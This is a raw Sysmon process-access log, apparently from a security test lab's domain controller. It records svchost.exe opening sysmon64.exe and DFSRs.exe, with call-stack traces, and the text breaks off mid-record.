13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.353{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.306{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.306{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.290{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\S